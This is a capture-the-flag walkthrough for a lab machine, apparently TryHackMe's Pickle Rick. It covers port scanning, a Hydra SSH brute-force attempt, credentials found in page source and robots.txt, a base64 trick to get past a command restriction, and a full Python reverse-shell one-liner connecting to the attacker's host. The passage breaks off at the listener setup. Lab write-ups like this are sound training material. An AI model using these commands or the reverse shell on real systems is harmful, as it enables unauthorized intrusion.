Write-up

Step-by-step guide on the approach taken to pwn the machine.

Objectives

In this machine, we are tasked with finding three specific items.

Reconnaissance

As usual, we start by scanning for open ports using nmap:

sudo nmap -F -T5 -sCV <ip_victim>

We discover two open ports:

22 SSH
80 HTTP

Let's start with port 80 by visiting the webpage:

http://<ip_victim>:80

We find a message from Rick asking for help, stating he can't remember his password. Examining the source code with Ctrl+U, we find a username: R1ckRul3s.

To attempt brute-forcing the password for SSH, we run Hydra:

hydra -l R1ckRul3s -P /usr/share/wordlists/rockyou.txt ssh://<ip_victim>

However, SSH does not support password authentication, so we shift our focus to directory enumeration using dirbuster.

dirbuster

The scan reveals the /portal.php directory, which redirects to login.php. Upon inspecting robots.txt, we find a string that we try as the password.

Using R1ckRul3s as the username and the discovered string as the password, we successfully log in.

Gaining a Shell

Inside the admin panel, we see a terminal for executing commands. Other sections are restricted to "the real Rick."

We start by checking our user context:

whoami

Then we list the files:

ls -la

We find Sup3rS3cretPickl3Ingred.txt. Attempting to read it with cat fails due to restrictions.

Instead, we use base64 encoding and decoding:

base64 "Sup3rS3cretPickl3Ingred.txt" | base64 --decode

We obtain the first ingredient.

Next, we attempt a reverse shell for easier interaction. Checking for Python availability:

python3 --version

With Python available, we use the reverse shell from pentestmonkey:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<our_ip>",<port_number>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We set up a listener on our machine: